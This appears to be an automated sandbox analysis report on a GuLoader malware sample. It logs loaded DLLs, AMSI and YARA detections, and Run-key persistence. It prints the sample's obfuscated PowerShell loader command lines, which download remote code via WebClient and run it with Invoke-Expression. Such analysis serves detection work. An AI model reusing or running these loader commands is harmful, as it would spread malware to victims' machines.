              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: m.Core.pdb source: powershell.exe, 0000000E.00000002.1672574353.000000000707B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdby source: powershell.exe, 0000000E.00000002.1672574353.00000000070E2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1672574353.00000000070E2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000E.00000002.1672574353.000000000707B000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin'", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000E.00000002.1678448244.000000000A310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1678157134.0000000008490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1669259847.00000000056D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1884830141.0000024B64330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Trovatore)$global:Saddelmagerarbejdes = [System.Text.Encoding]::ASCII.GetString($Hazardises)$global:socialisvmr=$Saddelmagerarbejdes.substring($Bortfaldets,$Poultice)<#Waysider Myzon
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Tortures $spermation $Angstfuld), (Herredmmet @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Adorers = [AppDomain]::CurrentDomain.GetAssemblies()$global:S
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Reallnningers)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Akkvisitions, $false).DefineType($Formue, $
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Trovatore)$global:Saddelmagerarbejdes = [System.Text.Encoding]::ASCII.GetString($Hazardises)$global:socialisvmr=$Saddelmagerarbejdes.substring($Bortfaldets,$Poultice)<#Waysider Myzon
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSp
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D6E3B0 push eax; retf 14_2_02D6E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D60014 pushad ; iretd 14_2_02D60015
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D633E1 push esp; retf 14_2_02D633E9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D6FE02 push esp; retf 14_2_02D6FE09
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
